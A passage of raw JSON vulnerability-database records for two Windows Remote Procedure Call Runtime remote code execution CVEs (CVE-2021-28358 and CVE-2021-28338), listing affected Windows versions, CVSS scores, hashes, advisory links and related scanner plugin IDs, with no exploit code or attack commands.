CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"}], "hash": "cfb911b9eeebe31b826c2c31345c7926424b60ebc41c38fc3d3594fa0d2eb396", "hashmap": [{"hash": "2a18b1fdc0673fbf31b9863608ac7bba", "key": "extraReferences"}, {"hash": "78f4f73c76655409fc00a50ec9581930", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "6b27abee43e5b8391d1b0e3cb139f425", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "de448c8859630e2912e4b4e823348cda", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "61714292e358abe3d1a7d407e1c35aa9", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "aa6252d85f18063a0548f29a4eb5aeef", "key": "href"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28358", "id": "CVE-2021-28358", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"], "reporter": "cve@mitre.org", "title": "CVE-2021-28358", "type": "cve", "viewCount": 0}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "78f4f73c76655409fc00a50ec9581930"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "61714292e358abe3d1a7d407e1c35aa9"}, {"key": "extraReferences", "hash": "afecfb9bd2a5c7c08449f3ebe8c6c828"}, {"key": "href", "hash": "aa6252d85f18063a0548f29a4eb5aeef"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "c594085d7c8b8ed96cbad7bddf96e57c"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": "6b27abee43e5b8391d1b0e3cb139f425"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "de448c8859630e2912e4b4e823348cda"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "47913fd9286e658cb6c8e3d895f1bb822d3b962cc33eb77e136203199542d50c", "viewCount": 26, "enchantments": {"dependencies": {"references": [{"type": "mscve", "idList": ["MS:CVE-2021-28358"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001330.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001340.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL"]}, {"type": "kaspersky", "idList": ["KLA12142", "KLA12139"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"]}], "modified": "2021-04-28T11:49:18", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2021-04-28T11:49:18", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383155851733663745", "text": " NEW: CVE-2021-28358 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/uyz8g9BDBa?amp=1"}]}}, "objectVersion": "1.5", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28358"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null}, {"id": "CVE-2021-28338", "bulletinFamily": "NVD", "title": "CVE-2021-28338", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T18:46:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28338", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"], "cvelist": ["CVE-2021-28338"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:18", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28338"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28338"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"}], "hash": "28bf3dc2af4ac24d16d837a812b447ec06e5b20784b85a88872104b4aa069e61", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "56970f93ddbac96aee2af3141137aa63", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "645d9bdffc19052ee81cb44f1b14d612", "key": "description"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bf2962b724a170e86e963359b8b61c71", "key": "extraReferences"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "62e8ad1b8c3700fc74ffff59d9130ce1", "key": "title"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "6aefee817c9df1154a1099e542765bde", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "2427fcc067deb674865cdb7a1b7e02b4", "key": "href"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "ffaff68fab990a215ada8bdc1d12277b", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28338", "id": "CVE-2021-28338", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T18:46:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28338"], "reporter": "cve@mitre.org", "title": "CVE-2021-28338", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28338"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", 